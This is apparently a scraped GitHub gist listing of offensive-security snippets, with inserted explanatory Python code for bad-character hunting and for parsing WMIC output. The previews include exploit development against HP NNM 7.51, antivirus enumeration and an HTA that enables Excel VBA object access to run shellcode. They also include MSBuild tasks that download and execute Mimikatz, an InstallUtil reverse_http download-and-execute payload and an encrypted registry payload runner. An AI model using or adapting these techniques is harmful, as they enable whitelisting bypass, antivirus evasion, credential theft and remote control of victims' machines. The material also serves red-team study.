@DanielRTeixeira
DanielRTeixeira / badchars.py
Created October 31, 2018 21:28
Find bad characters in HP NNM 7.51 with winappdbg
from winappdbg import *
import os, sys, socket, time, threading
## Global Vars
allchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
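The preview above stops at the charset string, so here is the comparison logic that a bad-character hunt of this kind rests on, as an added example that is not the gist's own code. The target is a constructed stand-in (a function that truncates at a line feed, strips carriage returns and rewrites one byte), so the loop runs offline; in the gist's setting that stand-in would be a read of the crashing process's memory through winappdbg (for instance Process.read(address, size)) after the request is sent. The NNM-specific byte behaviour shown is invented for illustration, not a finding about the product.

```python
# Added example (not the gist's code): the comparison step behind a
# bad-character hunt, driven against a constructed fake target so it runs
# offline. In the gist's setting fake_target is replaced by a function that
# sends the payload to the service and reads the buffer back from the
# debugged process (e.g. winappdbg's Process.read(address, size)).

from typing import Callable, Iterable, Optional


def all_chars(exclude: Iterable[int] = (0x00,)) -> bytes:
    """Every byte value minus the ones already known to be bad.
    0x00 is excluded up front, as in the gist's allchars, because a NUL
    terminates C strings and would truncate the test buffer immediately."""
    excluded = set(exclude)
    return bytes(b for b in range(0x100) if b not in excluded)


def to_escaped(data: bytes) -> str:
    """Render bytes the way the gist's allchars string is written: \\x01\\x02..."""
    return "".join(f"\\x{b:02x}" for b in data)


def first_mismatch(sent: bytes, found: bytes) -> Optional[int]:
    """Return the first byte of `sent` that did not survive the round trip,
    or None if memory matches the input exactly.

    Only the first mismatch is trusted: a byte that is dropped, expanded
    (0x0a -> 0x0d 0x0a) or treated as a terminator shifts or cuts everything
    after it, so later positions differ even when those bytes are fine."""
    for i, b in enumerate(sent):
        if i >= len(found) or found[i] != b:
            return b
    return None


def hunt_bad_chars(send_and_read: Callable[[bytes], bytes],
                   known_bad: Iterable[int] = (0x00,)) -> list:
    """Send the charset, compare it with what landed in memory, exclude the
    first bad byte, and repeat until the whole charset survives intact.
    `send_and_read` delivers the payload and returns the bytes found at the
    buffer's address afterwards."""
    bad = set(known_bad)
    while True:
        payload = all_chars(exclude=bad)
        b = first_mismatch(payload, send_and_read(payload))
        if b is None:
            return sorted(bad)
        bad.add(b)


def fake_target(payload: bytes) -> bytes:
    """Constructed stand-in for the target process (not real NNM behaviour):
    the receiving parser stops at a line feed, strips carriage returns, and
    rewrites '%' (0x25) to '?' (0x3f)."""
    out = bytearray()
    for b in payload:
        if b == 0x0a:
            break
        if b == 0x0d:
            continue
        out.append(0x3f if b == 0x25 else b)
    return bytes(out)


if __name__ == "__main__":
    bad = hunt_bad_chars(fake_target)
    print("bad chars:", to_escaped(bytes(bad)))          # \x00\x0a\x0d\x25
    print("clean charset:", to_escaped(all_chars(exclude=bad)))
```

The loop removes one byte per round on purpose: after the first mismatch nothing further in the dump can be trusted, and the usual mistake is to read every later difference as a bad character and throw away half the charset.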
@DanielRTeixeira
DanielRTeixeira / wmic_cmds.txt
Created July 14, 2018 17:33 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
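The queries above print one `Name=Value` line per property with blank lines between instances. The following parser, added here and not part of the forked gist, turns that output into Python dicts so the enumeration can be filtered or diffed across hosts. The sample output is constructed, not captured from a real system (property names follow Win32_OperatingSystem and AntiVirusProduct; the values are made up), and the productState decoding is a commonly used heuristic rather than a documented format.

```python
# Added example (not the gist's code): parse `wmic ... LIST full` /
# `wmic ... GET /format:list` output into dicts, one per WMI instance.
# SAMPLE_OS and SAMPLE_AV are constructed, not captured from a host.

from typing import Dict, List

SAMPLE_OS = """
BootDevice=\\Device\\HarddiskVolume1
BuildNumber=14393
Caption=Microsoft Windows Server 2016 Standard
CSName=SRV01
OSArchitecture=64-bit
Version=10.0.14393

"""

SAMPLE_AV = """
displayName=Windows Defender
instanceGuid={00000000-0000-0000-0000-000000000001}
pathToSignedProductExe=windowsdefender://
productState=397568


displayName=ExampleAV Endpoint
instanceGuid={00000000-0000-0000-0000-000000000002}
pathToSignedProductExe=C:\\Program Files\\ExampleAV\\eav.exe
productState=262144

"""


def parse_wmic_list(text: str) -> List[Dict[str, str]]:
    """Parse wmic LIST / format:list output. Instances are separated by blank
    lines; each property is one `Name=Value` line. On a real host wmic writes
    UTF-16 with CRLF line ends, so decode first; '\\r' is stripped here."""
    instances: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if not line.strip():
            if current:
                instances.append(current)
                current = {}
            continue
        name, sep, value = line.partition("=")
        if sep:  # ignore anything that is not Name=Value
            current[name.strip()] = value.strip()
    if current:
        instances.append(current)
    return instances


def decode_product_state(state: int) -> Dict[str, bool]:
    """Heuristic (assumption, not documented by Microsoft): in the 0xAABBCC
    layout of AntiVirusProduct.productState, bit 0x10 of byte BB means
    real-time protection is on, and byte CC == 0x00 means definitions are
    current (0x10 means out of date). Verify against the host's own UI."""
    enabled = bool((state >> 8) & 0x10)
    up_to_date = (state & 0xFF) == 0x00
    return {"enabled": enabled, "up_to_date": up_to_date}


def summarize_av(text: str) -> List[Dict[str, object]]:
    """Name plus decoded state for every product in securitycenter2 output."""
    out: List[Dict[str, object]] = []
    for inst in parse_wmic_list(text):
        state = int(inst.get("productState", "0"))
        out.append({"name": inst.get("displayName", "?"), **decode_product_state(state)})
    return out


if __name__ == "__main__":
    os_info = parse_wmic_list(SAMPLE_OS)[0]
    print(os_info["Caption"], os_info["Version"])
    for av in summarize_av(SAMPLE_AV):
        print(av)
```

Feed it the stdout of `wmic os LIST full` or of the securitycenter2 query (decoded from UTF-16 on the host) and the same code handles both, since the list format is identical across classes.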
@DanielRTeixeira
DanielRTeixeira / CalcExcel.hta
Created November 2, 2017 15:28 — forked from nicholasmckinney/CalcExcel.hta
Shellcode Execution Via HTA
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
@DanielRTeixeira
DanielRTeixeira / katz.xml
Created November 2, 2017 15:28 — forked from nicholasmckinney/katz.xml
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@DanielRTeixeira
DanielRTeixeira / katz.xml
Created November 2, 2017 15:28 — forked from nicholasmckinney/katz.xml
MSBuild - Mimikatz - Server 2016
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
@DanielRTeixeira
DanielRTeixeira / rev_http.cs
Created November 2, 2017 15:28 — forked from nicholasmckinney/rev_http.cs
InstallUtil - Download And Execute Reverse_HTTP Payload
using System;
using System.Net;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:revshell.exe rev_http.cs
@DanielRTeixeira
DanielRTeixeira / RegRunner.cs
Created November 2, 2017 15:28 — forked from nicholasmckinney/RegRunner.cs
Executes Encrypted File From Registry
using System;
using System.IO;
using System.Text;
using Microsoft.Win32;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
function Start-PACFileHosting()
{
# Example PAC File Hosting
# Pattern after http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html
# example: http://localhost:8083/i.pac
# Be Certain Line 19 matches your Interceptor Config
Start-Job -ScriptBlock {
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8083/")
@DanielRTeixeira
DanielRTeixeira / web.config
Created November 2, 2017 15:27 — forked from nicholasmckinney/web.config
Encrypt Random Shit with aspnet_regiis.exe
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<!-- Encrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pef "secretStuff" "C:\Tools" -->
<!-- Decrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pdf "secretStuff" "C:\Tools" -->
<!-- See https://msdn.microsoft.com/en-us/library/2w117ede.aspx -->
<!-- Example by @subTee -->
<connectionStrings>
<add name="constr" connectionString="blah" />
</connectionStrings>
<system.web>